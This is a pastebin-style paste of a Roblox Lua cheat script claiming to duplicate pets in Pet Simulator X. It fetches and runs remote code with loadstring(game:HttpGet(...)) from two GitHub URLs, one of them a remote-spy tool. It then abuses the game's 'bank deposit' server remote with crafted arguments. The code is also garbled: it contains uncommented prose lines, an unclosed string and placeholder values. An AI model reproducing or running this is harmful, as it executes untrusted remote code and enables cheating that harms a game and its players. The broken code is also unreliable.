Facebook
From Morose Human, 1 Year ago, written in Plain Text.
This paste is a reply to Re: Re: Pet Simulator X Dupe Script from Tacky Horse - view diff
Embed
Download Paste or View Raw
Hits: 302
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/fikury/dupescripts/main/PetSimulatorX"))()
  2.  --BROUGHT TO YOU BY rbxscript.com!-
  3.  
  4.  
  5. Recognizing our BankID
  6. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  7.  
  8. local mybanks = lib.Network.Invoke("get my banks")
  9. local BankID = mybanks[1]['BUID']
  10. setclipboard(BankID)
  11. Script for finding pet IDs
  12. loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua))()
  13.  The dup script itself
  14. local args = {
  15.     [1] = {
  16.         [1] = "here_bankid",
  17.         [2] = {},
  18.         [3] = number of hemes
  19.     }
  20. }
  21. workspace.THINGS.REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))
  22. --Tutorial : https://youtu.be/q2kLiSdZ5Bg